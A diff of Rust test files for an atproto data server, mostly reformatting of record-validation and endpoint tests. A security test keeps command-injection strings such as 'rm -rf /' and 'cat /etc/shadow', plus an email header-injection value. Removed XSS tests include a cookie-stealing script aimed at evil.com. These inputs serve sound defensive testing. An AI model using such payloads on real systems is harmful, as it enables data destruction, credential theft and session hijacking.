= json!({ 242 "$type": "app.bsky.graph.listitem", ··· 244 "list": "at://did:plc:owner/app.bsky.graph.list/mylist", 245 "createdAt": now() 246 }); 247 - assert_eq!(validator.validate(&valid_list_item, "app.bsky.graph.listitem").unwrap(), ValidationStatus::Valid); 248 } 249 250 #[test] ··· 257 "displayName": "My Feed", 258 "createdAt": now() 259 }); 260 - assert_eq!(validator.validate(&valid_generator, "app.bsky.feed.generator").unwrap(), ValidationStatus::Valid); 261 262 let generator_displayname_too_long = json!({ 263 "$type": "app.bsky.feed.generator", ··· 265 "displayName": "f".repeat(241), 266 "createdAt": now() 267 }); 268 - assert!(matches!(validator.validate(&generator_displayname_too_long, "app.bsky.feed.generator"), Err(ValidationError::InvalidField { path, .. }) if path == "displayName")); 269 270 let valid_threadgate = json!({ 271 "$type": "app.bsky.feed.threadgate", 272 "post": "at://did:plc:test/app.bsky.feed.post/123", 273 "createdAt": now() 274 }); 275 - assert_eq!(validator.validate(&valid_threadgate, "app.bsky.feed.threadgate").unwrap(), ValidationStatus::Valid); 276 277 let valid_labeler = json!({ 278 "$type": "app.bsky.labeler.service", ··· 281 }, 282 "createdAt": now() 283 }); 284 - assert_eq!(validator.validate(&valid_labeler, "app.bsky.labeler.service").unwrap(), ValidationStatus::Valid); 285 } 286 287 #[test] ··· 293 "$type": "com.custom.record", 294 "data": "test" 295 }); 296 - assert_eq!(validator.validate(&custom_record, "com.custom.record").unwrap(), ValidationStatus::Unknown); 297 - assert!(matches!(strict_validator.validate(&custom_record, "com.custom.record"), Err(ValidationError::UnknownType(_)))); 298 299 let type_mismatch = json!({ 300 "$type": "app.bsky.feed.like", ··· 309 let missing_type = json!({ 310 "text": "Hello" 311 }); 312 - assert!(matches!(validator.validate(&missing_type, "app.bsky.feed.post"), Err(ValidationError::MissingType))); 313 314 let not_object = json!("just a string"); 315 - assert!(matches!(validator.validate(&not_object, "app.bsky.feed.post"), Err(ValidationError::InvalidRecord(_)))); 316 317 let valid_datetime = json!({ 318 "$type": "app.bsky.feed.post", 319 "text": "Test", 320 "createdAt": "2024-01-15T10:30:00.000Z" 321 }); 322 - assert_eq!(validator.validate(&valid_datetime, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid); 323 324 let datetime_with_offset = json!({ 325 "$type": "app.bsky.feed.post", 326 "text": "Test", 327 "createdAt": "2024-01-15T10:30:00+05:30" 328 }); 329 - assert_eq!(validator.validate(&datetime_with_offset, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid); 330 331 let invalid_datetime = json!({ 332 "$type": "app.bsky.feed.post", 333 "text": "Test", 334 "createdAt": "2024/01/15" 335 }); 336 - assert!(matches!(validator.validate(&invalid_datetime, "app.bsky.feed.post"), Err(ValidationError::InvalidDatetime { .. }))); 337 } 338 339 #[test] ··· 345 assert!(validate_record_key("valid~key").is_ok()); 346 assert!(validate_record_key("self").is_ok()); 347 348 - assert!(matches!(validate_record_key(""), Err(ValidationError::InvalidRecord(_)))); 349 350 assert!(validate_record_key(".").is_err()); 351 assert!(validate_record_key("..").is_err()); ··· 355 assert!(validate_record_key("invalid@key").is_err()); 356 assert!(validate_record_key("invalid#key").is_err()); 357 358 - assert!(matches!(validate_record_key(&"k".repeat(513)), Err(ValidationError::InvalidRecord(_)))); 359 assert!(validate_record_key(&"k".repeat(512)).is_ok()); 360 } 361 ··· 366 assert!(validate_collection_nsid("a.b.c").is_ok()); 367 assert!(validate_collection_nsid("my-app.domain.record-type").is_ok()); 368 369 - assert!(matches!(validate_collection_nsid(""), Err(ValidationError::InvalidRecord(_)))); 370 371 assert!(validate_collection_nsid("a").is_err()); 372 assert!(validate_collection_nsid("a.b").is_err());
··· 1 + use serde_json::json; 2 use tranquil_pds::validation::{ 3 RecordValidator, ValidationError, ValidationStatus, validate_collection_nsid, 4 validate_record_key, 5 }; 6 7 fn now() -> String { 8 chrono::Utc::now().to_rfc3339() ··· 17 "text": "Hello world!", 18 "createdAt": now() 19 }); 20 + assert_eq!( 21 + validator 22 + .validate(&valid_post, "app.bsky.feed.post") 23 + .unwrap(), 24 + ValidationStatus::Valid 25 + ); 26 27 let missing_text = json!({ 28 "$type": "app.bsky.feed.post", 29 "createdAt": now() 30 }); 31 + assert!( 32 + matches!(validator.validate(&missing_text, "app.bsky.feed.post"), Err(ValidationError::MissingField(f)) if f == "text") 33 + ); 34 35 let missing_created_at = json!({ 36 "$type": "app.bsky.feed.post", 37 "text": "Hello" 38 }); 39 + assert!( 40 + matches!(validator.validate(&missing_created_at, "app.bsky.feed.post"), Err(ValidationError::MissingField(f)) if f == "createdAt") 41 + ); 42 43 let text_too_long = json!({ 44 "$type": "app.bsky.feed.post", 45 "text": "a".repeat(3001), 46 "createdAt": now() 47 }); 48 + assert!( 49 + matches!(validator.validate(&text_too_long, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "text") 50 + ); 51 52 let text_at_limit = json!({ 53 "$type": "app.bsky.feed.post", 54 "text": "a".repeat(3000), 55 "createdAt": now() 56 }); 57 + assert_eq!( 58 + validator 59 + .validate(&text_at_limit, "app.bsky.feed.post") 60 + .unwrap(), 61 + ValidationStatus::Valid 62 + ); 63 64 let too_many_langs = json!({ 65 "$type": "app.bsky.feed.post", ··· 67 "createdAt": now(), 68 "langs": ["en", "fr", "de", "es"] 69 }); 70 + assert!( 71 + matches!(validator.validate(&too_many_langs, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "langs") 72 + ); 73 74 let three_langs_ok = json!({ 75 "$type": "app.bsky.feed.post", ··· 77 "createdAt": now(), 78 "langs": ["en", "fr", "de"] 79 }); 80 + assert_eq!( 81 + validator 82 + .validate(&three_langs_ok, "app.bsky.feed.post") 83 + .unwrap(), 84 + ValidationStatus::Valid 85 + ); 86 87 let too_many_tags = json!({ 88 "$type": "app.bsky.feed.post", ··· 90 "createdAt": now(), 91 "tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8", "tag9"] 92 }); 93 + assert!( 94 + matches!(validator.validate(&too_many_tags, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "tags") 95 + ); 96 97 let eight_tags_ok = json!({ 98 "$type": "app.bsky.feed.post", ··· 100 "createdAt": now(), 101 "tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8"] 102 }); 103 + assert_eq!( 104 + validator 105 + .validate(&eight_tags_ok, "app.bsky.feed.post") 106 + .unwrap(), 107 + ValidationStatus::Valid 108 + ); 109 110 let tag_too_long = json!({ 111 "$type": "app.bsky.feed.post", ··· 113 "createdAt": now(), 114 "tags": ["t".repeat(641)] 115 }); 116 + assert!( 117 + matches!(validator.validate(&tag_too_long, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/")) 118 + ); 119 } 120 121 #[test] ··· 127 "displayName": "Test User", 128 "description": "A test user profile" 129 }); 130 + assert_eq!( 131 + validator 132 + .validate(&valid, "app.bsky.actor.profile") 133 + .unwrap(), 134 + ValidationStatus::Valid 135 + ); 136 137 let empty_ok = json!({ 138 "$type": "app.bsky.actor.profile" 139 }); 140 + assert_eq!( 141 + validator 142 + .validate(&empty_ok, "app.bsky.actor.profile") 143 + .unwrap(), 144 + ValidationStatus::Valid 145 + ); 146 147 let displayname_too_long = json!({ 148 "$type": "app.bsky.actor.profile", 149 "displayName": "n".repeat(641) 150 }); 151 + assert!( 152 + matches!(validator.validate(&displayname_too_long, "app.bsky.actor.profile"), Err(ValidationError::InvalidField { path, .. }) if path == "displayName") 153 + ); 154 155 let description_too_long = json!({ 156 "$type": "app.bsky.actor.profile", 157 "description": "d".repeat(2561) 158 }); 159 + assert!( 160 + matches!(validator.validate(&description_too_long, "app.bsky.actor.profile"), Err(ValidationError::InvalidField { path, .. }) if path == "description") 161 + ); 162 } 163 164 #[test] ··· 173 }, 174 "createdAt": now() 175 }); 176 + assert_eq!( 177 + validator 178 + .validate(&valid_like, "app.bsky.feed.like") 179 + .unwrap(), 180 + ValidationStatus::Valid 181 + ); 182 183 let missing_subject = json!({ 184 "$type": "app.bsky.feed.like", 185 "createdAt": now() 186 }); 187 + assert!( 188 + matches!(validator.validate(&missing_subject, "app.bsky.feed.like"), Err(ValidationError::MissingField(f)) if f == "subject") 189 + ); 190 191 let missing_subject_uri = json!({ 192 "$type": "app.bsky.feed.like", ··· 195 }, 196 "createdAt": now() 197 }); 198 + assert!( 199 + matches!(validator.validate(&missing_subject_uri, "app.bsky.feed.like"), Err(ValidationError::MissingField(f)) if f.contains("uri")) 200 + ); 201 202 let invalid_subject_uri = json!({ 203 "$type": "app.bsky.feed.like", ··· 207 }, 208 "createdAt": now() 209 }); 210 + assert!( 211 + matches!(validator.validate(&invalid_subject_uri, "app.bsky.feed.like"), Err(ValidationError::InvalidField { path, .. }) if path.contains("uri")) 212 + ); 213 214 let valid_repost = json!({ 215 "$type": "app.bsky.feed.repost", ··· 219 }, 220 "createdAt": now() 221 }); 222 + assert_eq!( 223 + validator 224 + .validate(&valid_repost, "app.bsky.feed.repost") 225 + .unwrap(), 226 + ValidationStatus::Valid 227 + ); 228 229 let repost_missing_subject = json!({ 230 "$type": "app.bsky.feed.repost", 231 "createdAt": now() 232 }); 233 + assert!( 234 + matches!(validator.validate(&repost_missing_subject, "app.bsky.feed.repost"), Err(ValidationError::MissingField(f)) if f == "subject") 235 + ); 236 } 237 238 #[test] ··· 244 "subject": "did:plc:test12345", 245 "createdAt": now() 246 }); 247 + assert_eq!( 248 + validator 249 + .validate(&valid_follow, "app.bsky.graph.follow") 250 + .unwrap(), 251 + ValidationStatus::Valid 252 + ); 253 254 let missing_follow_subject = json!({ 255 "$type": "app.bsky.graph.follow", 256 "createdAt": now() 257 }); 258 + assert!( 259 + matches!(validator.validate(&missing_follow_subject, "app.bsky.graph.follow"), Err(ValidationError::MissingField(f)) if f == "subject") 260 + ); 261 262 let invalid_follow_subject = json!({ 263 "$type": "app.bsky.graph.follow", 264 "subject": "not-a-did", 265 "createdAt": now() 266 }); 267 + assert!( 268 + matches!(validator.validate(&invalid_follow_subject, "app.bsky.graph.follow"), Err(ValidationError::InvalidField { path, .. }) if path == "subject") 269 + ); 270 271 let valid_block = json!({ 272 "$type": "app.bsky.graph.block", 273 "subject": "did:plc:blocked123", 274 "createdAt": now() 275 }); 276 + assert_eq!( 277 + validator 278 + .validate(&valid_block, "app.bsky.graph.block") 279 + .unwrap(), 280 + ValidationStatus::Valid 281 + ); 282 283 let invalid_block_subject = json!({ 284 "$type": "app.bsky.graph.block", 285 "subject": "not-a-did", 286 "createdAt": now() 287 }); 288 + assert!( 289 + matches!(validator.validate(&invalid_block_subject, "app.bsky.graph.block"), Err(ValidationError::InvalidField { path, .. }) if path == "subject") 290 + ); 291 } 292 293 #[test] ··· 300 "purpose": "app.bsky.graph.defs#modlist", 301 "createdAt": now() 302 }); 303 + assert_eq!( 304 + validator 305 + .validate(&valid_list, "app.bsky.graph.list") 306 + .unwrap(), 307 + ValidationStatus::Valid 308 + ); 309 310 let list_name_too_long = json!({ 311 "$type": "app.bsky.graph.list", ··· 313 "purpose": "app.bsky.graph.defs#modlist", 314 "createdAt": now() 315 }); 316 + assert!( 317 + matches!(validator.validate(&list_name_too_long, "app.bsky.graph.list"), Err(ValidationError::InvalidField { path, .. }) if path == "name") 318 + ); 319 320 let list_empty_name = json!({ 321 "$type": "app.bsky.graph.list", ··· 323 "purpose": "app.bsky.graph.defs#modlist", 324 "createdAt": now() 325 }); 326 + assert!( 327 + matches!(validator.validate(&list_empty_name, "app.bsky.graph.list"), Err(ValidationError::InvalidField { path, .. }) if path == "name") 328 + ); 329 330 let valid_list_item = json!({ 331 "$type": "app.bsky.graph.listitem", ··· 333 "list": "at://did:plc:owner/app.bsky.graph.list/mylist", 334 "createdAt": now() 335 }); 336 + assert_eq!( 337 + validator 338 + .validate(&valid_list_item, "app.bsky.graph.listitem") 339 + .unwrap(), 340 + ValidationStatus::Valid 341 + ); 342 } 343 344 #[test] ··· 351 "displayName": "My Feed", 352 "createdAt": now() 353 }); 354 + assert_eq!( 355 + validator 356 + .validate(&valid_generator, "app.bsky.feed.generator") 357 + .unwrap(), 358 + ValidationStatus::Valid 359 + ); 360 361 let generator_displayname_too_long = json!({ 362 "$type": "app.bsky.feed.generator", ··· 364 "displayName": "f".repeat(241), 365 "createdAt": now() 366 }); 367 + assert!( 368 + matches!(validator.validate(&generator_displayname_too_long, "app.bsky.feed.generator"), Err(ValidationError::InvalidField { path, .. }) if path == "displayName") 369 + ); 370 371 let valid_threadgate = json!({ 372 "$type": "app.bsky.feed.threadgate", 373 "post": "at://did:plc:test/app.bsky.feed.post/123", 374 "createdAt": now() 375 }); 376 + assert_eq!( 377 + validator 378 + .validate(&valid_threadgate, "app.bsky.feed.threadgate") 379 + .unwrap(), 380 + ValidationStatus::Valid 381 + ); 382 383 let valid_labeler = json!({ 384 "$type": "app.bsky.labeler.service", ··· 387 }, 388 "createdAt": now() 389 }); 390 + assert_eq!( 391 + validator 392 + .validate(&valid_labeler, "app.bsky.labeler.service") 393 + .unwrap(), 394 + ValidationStatus::Valid 395 + ); 396 } 397 398 #[test] ··· 404 "$type": "com.custom.record", 405 "data": "test" 406 }); 407 + assert_eq!( 408 + validator 409 + .validate(&custom_record, "com.custom.record") 410 + .unwrap(), 411 + ValidationStatus::Unknown 412 + ); 413 + assert!(matches!( 414 + strict_validator.validate(&custom_record, "com.custom.record"), 415 + Err(ValidationError::UnknownType(_)) 416 + )); 417 418 let type_mismatch = json!({ 419 "$type": "app.bsky.feed.like", ··· 428 let missing_type = json!({ 429 "text": "Hello" 430 }); 431 + assert!(matches!( 432 + validator.validate(&missing_type, "app.bsky.feed.post"), 433 + Err(ValidationError::MissingType) 434 + )); 435 436 let not_object = json!("just a string"); 437 + assert!(matches!( 438 + validator.validate(&not_object, "app.bsky.feed.post"), 439 + Err(ValidationError::InvalidRecord(_)) 440 + )); 441 442 let valid_datetime = json!({ 443 "$type": "app.bsky.feed.post", 444 "text": "Test", 445 "createdAt": "2024-01-15T10:30:00.000Z" 446 }); 447 + assert_eq!( 448 + validator 449 + .validate(&valid_datetime, "app.bsky.feed.post") 450 + .unwrap(), 451 + ValidationStatus::Valid 452 + ); 453 454 let datetime_with_offset = json!({ 455 "$type": "app.bsky.feed.post", 456 "text": "Test", 457 "createdAt": "2024-01-15T10:30:00+05:30" 458 }); 459 + assert_eq!( 460 + validator 461 + .validate(&datetime_with_offset, "app.bsky.feed.post") 462 + .unwrap(), 463 + ValidationStatus::Valid 464 + ); 465 466 let invalid_datetime = json!({ 467 "$type": "app.bsky.feed.post", 468 "text": "Test", 469 "createdAt": "2024/01/15" 470 }); 471 + assert!(matches!( 472 + validator.validate(&invalid_datetime, "app.bsky.feed.post"), 473 + Err(ValidationError::InvalidDatetime { .. }) 474 + )); 475 } 476 477 #[test] ··· 483 assert!(validate_record_key("valid~key").is_ok()); 484 assert!(validate_record_key("self").is_ok()); 485 486 + assert!(matches!( 487 + validate_record_key(""), 488 + Err(ValidationError::InvalidRecord(_)) 489 + )); 490 491 assert!(validate_record_key(".").is_err()); 492 assert!(validate_record_key("..").is_err()); ··· 496 assert!(validate_record_key("invalid@key").is_err()); 497 assert!(validate_record_key("invalid#key").is_err()); 498 499 + assert!(matches!( 500 + validate_record_key(&"k".repeat(513)), 501 + Err(ValidationError::InvalidRecord(_)) 502 + )); 503 assert!(validate_record_key(&"k".repeat(512)).is_ok()); 504 } 505 ··· 510 assert!(validate_collection_nsid("a.b.c").is_ok()); 511 assert!(validate_collection_nsid("my-app.domain.record-type").is_ok()); 512 513 + assert!(matches!( 514 + validate_collection_nsid(""), 515 + Err(ValidationError::InvalidRecord(_)) 516 + )); 517 518 assert!(validate_collection_nsid("a").is_err()); 519 assert!(validate_collection_nsid("a.b").is_err());
+31 -76
tests/security_fixes.rs
··· 1 mod common; 2 - use tranquil_pds::image::{ImageError, ImageProcessor}; 3 use tranquil_pds::comms::{SendError, is_valid_phone_number, sanitize_header_value}; 4 - use tranquil_pds::oauth::templates::{error_page, login_page, success_page}; 5 6 #[test] 7 fn test_header_injection_sanitization() { ··· 24 let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value"; 25 let sanitized = sanitize_header_value(header_injection); 26 assert_eq!(sanitized.split("\r\n").count(), 1); 27 - assert!(sanitized.contains("Normal Subject") && sanitized.contains("Bcc:") && sanitized.contains("X-Injected:")); 28 29 let with_null = "client\0id"; 30 assert!(sanitize_header_value(with_null).contains("client")); ··· 59 assert!(!is_valid_phone_number("+1(234)567890")); 60 assert!(!is_valid_phone_number("+1.234.567.890")); 61 62 - for malicious in ["+123; rm -rf /", "+123 && cat /etc/passwd", "+123`id`", 63 - "+123$(whoami)", "+123|cat /etc/shadow", "+123\n--help", 64 - "+123\r\n--version", "+123--help"] { 65 - assert!(!is_valid_phone_number(malicious), "Command injection '{}' should be rejected", malicious); 66 } 67 } 68 ··· 88 } 89 90 #[test] 91 - fn test_oauth_template_xss_protection() { 92 - let html = login_page("<script>alert('xss')</script>", None, None, "test-uri", None, None); 93 - assert!(!html.contains("<script>") && html.contains("&lt;script&gt;")); 94 - 95 - let html = login_page("client123", Some("<img src=x onerror=alert('xss')>"), None, "test-uri", None, None); 96 - assert!(!html.contains("<img ") && html.contains("&lt;img")); 97 - 98 - let html = login_page("client123", None, Some("\"><script>alert('xss')</script>"), "test-uri", None, None); 99 - assert!(!html.contains("<script>")); 100 - 101 - let html = login_page("client123", None, None, "test-uri", 102 - Some("<script>document.location='http://evil.com?c='+document.cookie</script>"), None); 103 - assert!(!html.contains("<script>")); 104 - 105 - let html = login_page("client123", None, None, "test-uri", None, 106 - Some("\" onfocus=\"alert('xss')\" autofocus=\"")); 107 - assert!(!html.contains("onfocus=\"alert") && html.contains("&quot;")); 108 - 109 - let html = login_page("client123", None, None, "\" onmouseover=\"alert('xss')\"", None, None); 110 - assert!(!html.contains("onmouseover=\"alert")); 111 - 112 - let html = error_page("<script>steal()</script>", Some("<img src=x onerror=evil()>")); 113 - assert!(!html.contains("<script>") && !html.contains("<img ")); 114 - 115 - let html = success_page(Some("<script>steal_session()</script>")); 116 - assert!(!html.contains("<script>")); 117 - 118 - for (page, name) in [ 119 - (login_page("client", None, None, "uri", None, None), "login"), 120 - (error_page("err", None), "error"), 121 - (success_page(None), "success"), 122 - ] { 123 - assert!(!page.contains("javascript:"), "{} page has javascript: URL", name); 124 - } 125 - 126 - let html = login_page("client123", None, None, "javascript:alert('xss')//", None, None); 127 - assert!(html.contains("action=\"/oauth/authorize\"")); 128 - } 129 - 130 - #[test] 131 - fn test_oauth_template_html_escaping() { 132 - let html = login_page("client&test", None, None, "test-uri", None, None); 133 - assert!(html.contains("&amp;") && !html.contains("client&test")); 134 - 135 - let html = login_page("client\"test'more", None, None, "test-uri", None, None); 136 - assert!(html.contains("&quot;") || html.contains("&#34;")); 137 - assert!(html.contains("&#39;") || html.contains("&apos;")); 138 - 139 - let html = login_page("client<test>more", None, None, "test-uri", None, None); 140 - assert!(html.contains("&lt;") && html.contains("&gt;") && !html.contains("<test>")); 141 - 142 - let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"), 143 - "valid-uri", None, Some("user@example.com")); 144 - assert!(html.contains("my-safe-client") || html.contains("My Safe App")); 145 - assert!(html.contains("read write") || html.contains("read")); 146 - assert!(html.contains("user@example.com")); 147 - 148 - let html = login_page("client", None, None, "\" onclick=\"alert('csrf')", None, None); 149 - assert!(!html.contains("onclick=\"alert")); 150 - 151 - let html = login_page("客户端 クライアント", None, None, "test-uri", None, None); 152 - assert!(html.contains("客户端") || html.contains("&#")); 153 - } 154 - 155 - #[test] 156 fn test_send_error_display() { 157 let timeout = SendError::Timeout; 158 assert!(!format!("{}", timeout).is_empty()); ··· 173 let base = base_url().await; 174 let http_client = client(); 175 176 - let res = http_client.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base)) 177 - .send().await.unwrap(); 178 assert_eq!(res.status(), reqwest::StatusCode::OK); 179 let body: serde_json::Value = res.json().await.unwrap(); 180 assert_eq!(body["activated"], true); 181 182 let (token, _did) = create_account_and_login(&http_client).await; 183 - let res = http_client.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base)) 184 .header("Authorization", format!("Bearer {}", token)) 185 - .send().await.unwrap(); 186 assert_eq!(res.status(), reqwest::StatusCode::OK); 187 let body: serde_json::Value = res.json().await.unwrap(); 188 assert_eq!(body["activated"], true);
··· 1 mod common; 2 use tranquil_pds::comms::{SendError, is_valid_phone_number, sanitize_header_value}; 3 + use tranquil_pds::image::{ImageError, ImageProcessor}; 4 5 #[test] 6 fn test_header_injection_sanitization() { ··· 23 let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value"; 24 let sanitized = sanitize_header_value(header_injection); 25 assert_eq!(sanitized.split("\r\n").count(), 1); 26 + assert!( 27 + sanitized.contains("Normal Subject") 28 + && sanitized.contains("Bcc:") 29 + && sanitized.contains("X-Injected:") 30 + ); 31 32 let with_null = "client\0id"; 33 assert!(sanitize_header_value(with_null).contains("client")); ··· 62 assert!(!is_valid_phone_number("+1(234)567890")); 63 assert!(!is_valid_phone_number("+1.234.567.890")); 64 65 + for malicious in [ 66 + "+123; rm -rf /", 67 + "+123 && cat /etc/passwd", 68 + "+123`id`", 69 + "+123$(whoami)", 70 + "+123|cat /etc/shadow", 71 + "+123\n--help", 72 + "+123\r\n--version", 73 + "+123--help", 74 + ] { 75 + assert!( 76 + !is_valid_phone_number(malicious), 77 + "Command injection '{}' should be rejected", 78 + malicious 79 + ); 80 } 81 } 82 ··· 102 } 103 104 #[test] 105 fn test_send_error_display() { 106 let timeout = SendError::Timeout; 107 assert!(!format!("{}", timeout).is_empty()); ··· 122 let base = base_url().await; 123 let http_client = client(); 124 125 + let res = http_client 126 + .get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base)) 127 + .send() 128 + .await 129 + .unwrap(); 130 assert_eq!(res.status(), reqwest::StatusCode::OK); 131 let body: serde_json::Value = res.json().await.unwrap(); 132 assert_eq!(body["activated"], true); 133 134 let (token, _did) = create_account_and_login(&http_client).await; 135 + let res = http_client 136 + .get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base)) 137 .header("Authorization", format!("Bearer {}", token)) 138 + .send() 139 + .await 140 + .unwrap(); 141 assert_eq!(res.status(), reqwest::StatusCode::OK); 142 let body: serde_json::Value = res.json().await.unwrap(); 143 assert_eq!(body["activated"], true);
+112 -33
tests/server.rs
··· 12 let health = client.get(format!("{}/health", base)).send().await.unwrap(); 13 assert_eq!(health.status(), StatusCode::OK); 14 assert_eq!(health.text().await.unwrap(), "OK"); 15 - let describe = client.get(format!("{}/xrpc/com.atproto.server.describeServer", base)).send().await.unwrap(); 16 assert_eq!(describe.status(), StatusCode::OK); 17 let body: Value = describe.json().await.unwrap(); 18 assert!(body.get("availableUserDomains").is_some()); ··· 24 let base = base_url().await; 25 let handle = format!("user_{}", uuid::Uuid::new_v4()); 26 let payload = json!({ "handle": handle, "email": format!("{}@example.com", handle), "password": "password" }); 27 - let create_res = client.post(format!("{}/xrpc/com.atproto.server.createAccount", base)) 28 - .json(&payload).send().await.unwrap(); 29 assert_eq!(create_res.status(), StatusCode::OK); 30 let create_body: Value = create_res.json().await.unwrap(); 31 let did = create_body["did"].as_str().unwrap(); 32 let _ = verify_new_account(&client, did).await; 33 - let login = client.post(format!("{}/xrpc/com.atproto.server.createSession", base)) 34 - .json(&json!({ "identifier": handle, "password": "password" })).send().await.unwrap(); 35 assert_eq!(login.status(), StatusCode::OK); 36 let login_body: Value = login.json().await.unwrap(); 37 let access_jwt = login_body["accessJwt"].as_str().unwrap().to_string(); 38 let refresh_jwt = login_body["refreshJwt"].as_str().unwrap().to_string(); 39 - let refresh = client.post(format!("{}/xrpc/com.atproto.server.refreshSession", base)) 40 - .bearer_auth(&refresh_jwt).send().await.unwrap(); 41 assert_eq!(refresh.status(), StatusCode::OK); 42 let refresh_body: Value = refresh.json().await.unwrap(); 43 assert!(refresh_body["accessJwt"].as_str().is_some()); 44 assert_ne!(refresh_body["accessJwt"].as_str().unwrap(), access_jwt); 45 assert_ne!(refresh_body["refreshJwt"].as_str().unwrap(), refresh_jwt); 46 - let missing_id = client.post(format!("{}/xrpc/com.atproto.server.createSession", base)) 47 - .json(&json!({ "password": "password" })).send().await.unwrap(); 48 - assert!(missing_id.status() == StatusCode::BAD_REQUEST || missing_id.status() == StatusCode::UNPROCESSABLE_ENTITY); 49 let invalid_handle = client.post(format!("{}/xrpc/com.atproto.server.createAccount", base)) 50 .json(&json!({ "handle": "invalid!handle.com", "email": "test@example.com", "password": "password" })) 51 .send().await.unwrap(); 52 assert_eq!(invalid_handle.status(), StatusCode::BAD_REQUEST); 53 - let unauth_session = client.get(format!("{}/xrpc/com.atproto.server.getSession", base)) 54 - .bearer_auth(AUTH_TOKEN).send().await.unwrap(); 55 assert_eq!(unauth_session.status(), StatusCode::UNAUTHORIZED); 56 - let delete_session = client.post(format!("{}/xrpc/com.atproto.server.deleteSession", base)) 57 - .bearer_auth(AUTH_TOKEN).send().await.unwrap(); 58 assert_eq!(delete_session.status(), StatusCode::UNAUTHORIZED); 59 } 60 ··· 63 let client = client(); 64 let base = base_url().await; 65 let (access_jwt, did) = create_account_and_login(&client).await; 66 - let res = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base)) 67 - .bearer_auth(&access_jwt).query(&[("aud", "did:web:example.com")]).send().await.unwrap(); 68 assert_eq!(res.status(), StatusCode::OK); 69 let body: Value = res.json().await.unwrap(); 70 let token = body["token"].as_str().unwrap(); ··· 76 assert_eq!(claims["iss"], did); 77 assert_eq!(claims["sub"], did); 78 assert_eq!(claims["aud"], "did:web:example.com"); 79 - let lxm_res = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base)) 80 - .bearer_auth(&access_jwt).query(&[("aud", "did:web:example.com"), ("lxm", "com.atproto.repo.getRecord")]) 81 - .send().await.unwrap(); 82 assert_eq!(lxm_res.status(), StatusCode::OK); 83 let lxm_body: Value = lxm_res.json().await.unwrap(); 84 let lxm_token = lxm_body["token"].as_str().unwrap(); ··· 86 let lxm_payload = URL_SAFE_NO_PAD.decode(lxm_parts[1]).unwrap(); 87 let lxm_claims: Value = serde_json::from_slice(&lxm_payload).unwrap(); 88 assert_eq!(lxm_claims["lxm"], "com.atproto.repo.getRecord"); 89 - let unauth = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base)) 90 - .query(&[("aud", "did:web:example.com")]).send().await.unwrap(); 91 assert_eq!(unauth.status(), StatusCode::UNAUTHORIZED); 92 - let missing_aud = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base)) 93 - .bearer_auth(&access_jwt).send().await.unwrap(); 94 assert_eq!(missing_aud.status(), StatusCode::BAD_REQUEST); 95 } 96 ··· 99 let client = client(); 100 let base = base_url().await; 101 let (access_jwt, _) = create_account_and_login(&client).await; 102 - let status = client.get(format!("{}/xrpc/com.atproto.server.checkAccountStatus", base)) 103 - .bearer_auth(&access_jwt).send().await.unwrap(); 104 assert_eq!(status.status(), StatusCode::OK); 105 let body: Value = status.json().await.unwrap(); 106 assert_eq!(body["activated"], true); ··· 108 assert!(body["repoCommit"].is_string()); 109 assert!(body["repoRev"].is_string()); 110 assert!(body["indexedRecords"].is_number()); 111 - let unauth_status = client.get(format!("{}/xrpc/com.atproto.server.checkAccountStatus", base)) 112 - .send().await.unwrap(); 113 assert_eq!(unauth_status.status(), StatusCode::UNAUTHORIZED); 114 - let activate = client.post(format!("{}/xrpc/com.atproto.server.activateAccount", base)) 115 - .bearer_auth(&access_jwt).send().await.unwrap(); 116 assert_eq!(activate.status(), StatusCode::OK); 117 - let unauth_activate = client.post(format!("{}/xrpc/com.atproto.server.activateAccount", base)) 118 - .send().await.unwrap(); 119 assert_eq!(unauth_activate.status(), StatusCode::UNAUTHORIZED); 120 - let deactivate = client.post(format!("{}/xrpc/com.atproto.server.deactivateAccount", base)) 121 - .bearer_auth(&access_jwt).json(&json!({})).send().await.unwrap(); 122 assert_eq!(deactivate.status(), StatusCode::OK); 123 }
··· 12 let health = client.get(format!("{}/health", base)).send().await.unwrap(); 13 assert_eq!(health.status(), StatusCode::OK); 14 assert_eq!(health.text().await.unwrap(), "OK"); 15 + let describe = client 16 + .get(format!("{}/xrpc/com.atproto.server.describeServer", base)) 17 + .send() 18 + .await 19 + .unwrap(); 20 assert_eq!(describe.status(), StatusCode::OK); 21 let body: Value = describe.json().await.unwrap(); 22 assert!(body.get("availableUserDomains").is_some()); ··· 28 let base = base_url().await; 29 let handle = format!("user_{}", uuid::Uuid::new_v4()); 30 let payload = json!({ "handle": handle, "email": format!("{}@example.com", handle), "password": "password" }); 31 + let create_res = client 32 + .post(format!("{}/xrpc/com.atproto.server.createAccount", base)) 33 + .json(&payload) 34 + .send() 35 + .await 36 + .unwrap(); 37 assert_eq!(create_res.status(), StatusCode::OK); 38 let create_body: Value = create_res.json().await.unwrap(); 39 let did = create_body["did"].as_str().unwrap(); 40 let _ = verify_new_account(&client, did).await; 41 + let login = client 42 + .post(format!("{}/xrpc/com.atproto.server.createSession", base)) 43 + .json(&json!({ "identifier": handle, "password": "password" })) 44 + .send() 45 + .await 46 + .unwrap(); 47 assert_eq!(login.status(), StatusCode::OK); 48 let login_body: Value = login.json().await.unwrap(); 49 let access_jwt = login_body["accessJwt"].as_str().unwrap().to_string(); 50 let refresh_jwt = login_body["refreshJwt"].as_str().unwrap().to_string(); 51 + let refresh = client 52 + .post(format!("{}/xrpc/com.atproto.server.refreshSession", 